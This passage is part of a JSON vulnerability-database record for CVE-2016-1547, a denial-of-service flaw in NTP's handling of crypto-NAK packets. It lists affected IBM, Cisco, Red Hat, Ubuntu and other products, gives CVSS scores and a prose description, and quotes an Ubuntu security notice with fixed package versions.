"vendor": "ibm", "version": "8.0.0.2" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.02" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.13" }, { "model": "dcm series 9900-digital content manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "application policy infrastructure controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.9" }, { "model": "ntp", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.3.25" }, { "model": "powerkvm", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "7" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.0" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.6" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.4" }, { "model": "network analysis module", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.50" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "90000" }, { "model": "security access manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1.0" }, { "model": "4.2.8p4", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.20" }, { "model": "prime infrastructure", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.5" }, { "model": "security network protection", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.3.2.4" }, { "model": "exalogic infrastructure", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.0" }, { "model": "nac guest server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "enterprise content delivery system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "identity services engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2.1" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.1" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.4" }, { "model": "4.2.8p6", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.7" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.18" }, { "model": "security privileged identity manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.1" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "powerkvm", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "telepresence ex series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.16" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.13" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.0" }, { "model": "edge digital media player", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3400" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "4.2.7p11", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.0" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.7" }, { "model": "enterprise linux server eus", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7.2" }, { "model": "p153", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.5" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.3" }, { "model": "video delivery system recorder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "small business series wireless access points", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3210" }, { "model": "p7-rc2", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.4" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber guest", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.0(2)" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.37" }, { "model": "p150", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.5" }, { "model": "smartcloud entry appliance fi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.4" }, { "model": "4.2.5p186", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.8" }, { "model": "network device security assessment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.1" }, { "model": "prime license manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "asa cx and cisco prime security manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "visual quality experience server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "digital media manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.3" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.1" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.4.0" }, { "model": "4.2.5p3", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2.2" }, { "model": "prime collaboration assurance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "standalone rack server cimc", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "linux -current", "scope": null, "trust": 0.3, "vendor": "slackware", "version": null }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.2" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.1" }, { "model": "telepresence conductor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.19" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.1" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.5" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "security access manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.8" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.37" }, { "model": "prime infrastructure standalone plug and play gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unity express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.0" }, { "model": "content security appliance updater servers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ntp", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.3.70" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.5" }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7.2" }, { "model": "telepresence video communication server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.2" }, { "model": "p8", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.4" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.8.1.0" }, { "model": "4.2.8p5", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "exalogic infrastructure", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "2.0" }, { "model": "telepresence exchange system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence sx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "4.2.8p3", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.8.2.0" }, { "model": "prime access registrar appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "scos", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.7.9.0" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "14.04" }, { "model": "4.2.7p111", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "unified communications manager session management edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "linux lts i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "meetingplace", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security privileged identity manager fixpack", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2.0.28" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.6" }, { "model": "support central", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.3" }, { "model": "ntp", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.6" }, { "model": "small business series wireless access points", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5000" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.2" }, { "model": "virtual security gateway for microsoft hyper-v", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified computing system e-series blade server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.5" }, { "model": "enterprise linux hpc node eus", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7.2" }, { "model": "clean access manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ntp", "scope": "ne", "trust": 0.3, "vendor": "ntp", "version": "4.3.92" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2.3" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.11" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.10" }, { "model": "p74", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.5" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "hosted collaboration mediation fulfillment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.0" }, { "model": "p4", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.2" }, { "model": "linux lts amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "expressway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "common services platform collector", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.8.4.0" }, { "model": "prime service catalog virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smartcloud entry appliance fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.26" }, { "model": "4.2.8p2", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.17" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.15" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.12" }, { "model": "lotus protector for mail security", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.80" }, { "model": "prime access registrar", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "wap371 wireless access point", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.2" }, { "model": "onepk all-in-one vm", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "media experience engines", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "intrusion prevention system solutions", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.1" }, { "model": "access registrar appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "p1", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.2" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.14" }, { "model": "edge digital media player", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3000" }, { "model": "ntp", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.3.90" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.8.5.0" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "videoscape control suite", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smartcloud entry appliance fi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.0.4" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.9" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.3" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "management heartbeat server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.1" }, { "model": "series ip phones vpn feature", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8800-0" }, { "model": "mediasense", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence mx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.14" }, { "model": "lotus protector for mail security", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.8.1.0" }, { "model": "small business series wireless access points", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1210" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.0" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.4" }, { "model": "industrial router", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9100" }, { "model": "p6", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.4" }, { "model": "ucs central", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence profile series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.8.3.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "visual quality experience tools server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "4.2.8p1", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.4" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.03" }, { "model": "video distribution suite for internet streaming", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "4.2.8p7", "scope": "ne", "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "4.2.7p366", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "im and presence service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.11" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.20" }, { "model": "connected grid routers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "smartcloud entry appliance fi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.0.4" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.4" }, { "model": "security network protection", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.10" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "p4", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.4" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.5" }, { "model": "telepresence integrator c series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.2" }, { "model": "show and share", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "sentinel", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security identity governance and intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.1" }, { "model": "p7", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.4" }, { "model": "nac server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "cloud object store", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.3" }, { "model": "ucs director", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ntp", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.3" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.1" }, { "model": "linux x86 64 -current", "scope": null, "trust": 0.3, "vendor": "slackware", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.4.0" }, { "model": "p5", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.4" }, { "model": "nac appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" } ], "sources": [ { "db": "CERT/CC", "id": "VU#718152" }, { "db": "BID", "id": "88276" }, { "db": "JVNDB", "id": "JVNDB-2016-006648" }, { "db": "NVD", "id": "CVE-2016-1547" }, { "db": "CNNVD", "id": "CNNVD-201604-602" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:ntp:ntp:*:p4:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "4.2.8", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2016-1547" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Siemens reported these vulnerabilities to CISA.", "sources": [ { "db": "CNNVD", "id": "CNNVD-201604-602" } ], "trust": 0.6 }, "cve": "CVE-2016-1547", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "Partial", "baseScore": 5.0, "confidentialityImpact": "None", "exploitabilityScore": null, "id": "CVE-2016-1547", "impactScore": null, "integrityImpact": "None", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Medium", "trust": 0.9, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "NVD", "availabilityImpact": "LOW", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "exploitabilityScore": 3.9, "impactScore": 1.4, "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.0" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "Low", "baseScore": 5.3, "baseSeverity": "Medium", "confidentialityImpact": "None", "exploitabilityScore": null, "id": "CVE-2016-1547", "impactScore": null, "integrityImpact": "None", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.0" } ], "severity": [ { "author": "NVD", "id": "CVE-2016-1547", "trust": 1.8, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201604-602", "trust": 0.6, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2016-1547", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-1547" }, { "db": "JVNDB", "id": "JVNDB-2016-006648" }, { "db": "NVD", "id": "CVE-2016-1547" }, { "db": "CNNVD", "id": "CNNVD-201604-602" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "An off-path attacker can cause a preemptible client association to be demobilized in NTP 4.2.8p4 and earlier and NTPSec a5fb34b9cc89b92a8fef2f459004865c93bb7f92 by sending a crypto NAK packet to a victim client with a spoofed source address of an existing associated peer. This is true even if authentication is enabled. The NTP.org reference implementation of ntpd contains multiple vulnerabilities. NTP is prone to a denial-of-service vulnerability. \nAn attacker can exploit this issue to cause a denial-of-service condition, denying service to legitimate users. \nVersions prior to NTP 4.2.8p7 and 4.3.x versions prior to 4.3.92 are vulnerable. ==========================================================================\nUbuntu Security Notice USN-3096-1\nOctober 05, 2016\n\nntp vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 16.04 LTS\n- Ubuntu 14.04 LTS\n- Ubuntu 12.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in NTP. A remote attacker could use this issue to perform a replay\nattack. (CVE-2015-7973)\n\nMatt Street discovered that NTP incorrectly verified peer associations of\nsymmetric keys. A remote attacker could use this issue to perform an\nimpersonation attack. (CVE-2015-7974)\n\nJonathan Gardner discovered that the NTP ntpq utility incorrectly handled\nmemory. This issue only affected Ubuntu 16.04\nLTS. (CVE-2015-7975)\n\nJonathan Gardner discovered that the NTP ntpq utility incorrectly handled\ndangerous characters in filenames. An attacker could possibly use this\nissue to overwrite arbitrary files. (CVE-2015-7976)\n\nStephen Gray discovered that NTP incorrectly handled large restrict lists. (CVE-2015-7977, CVE-2015-7978)\n\nAanchal Malhotra discovered that NTP incorrectly handled authenticated\nbroadcast mode. (CVE-2015-7979)\n\nJonathan Gardner discovered that NTP incorrectly handled origin timestamp\nchecks. A remote attacker could use this issue to spoof peer servers. \n(CVE-2015-8138)\n\nJonathan Gardner discovered that the NTP ntpq utility did not properly\nhandle certain incorrect values. (CVE-2015-8158)\n\nIt was discovered that the NTP cronjob incorrectly cleaned up the\nstatistics directory. A local attacker could possibly use this to escalate\nprivileges. (CVE-2016-0727)\n\nStephen Gray and Matthew Van Gundy discovered that NTP incorrectly\nvalidated crypto-NAKs. A remote attacker could possibly use this issue to\nprevent clients from synchronizing. A remote attacker could\npossibly use this issue to prevent clients from synchronizing. \n(CVE-2016-1548)\n\nMatthew Van Gundy, Stephen Gray and Loganaden Velvindron discovered that\nNTP incorrectly handled message authentication. (CVE-2016-1550)\n\nYihan Lian discovered that NTP incorrectly handled duplicate IPs on\nunconfig directives. (CVE-2016-4956)\n\nIn the default installation, attackers would be isolated by the NTP\nAppArmor profile. \n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 16.04 LTS:\n ntp 1:4.2.8p4+dfsg-3ubuntu5.3\n\nUbuntu 14.04 LTS:\n ntp 1:4.2.6.p5+dfsg-3ubuntu2.14.04.10\n\nUbuntu 12.04 LTS:\n ntp 1:4.2.6.p3+dfsg-1ubuntu3.11\n\nIn general, a standard system update will make all the necessary changes. 6.7) - i386, noarch, ppc64, s390x, x86_64\n\n3. \n- - - - - - 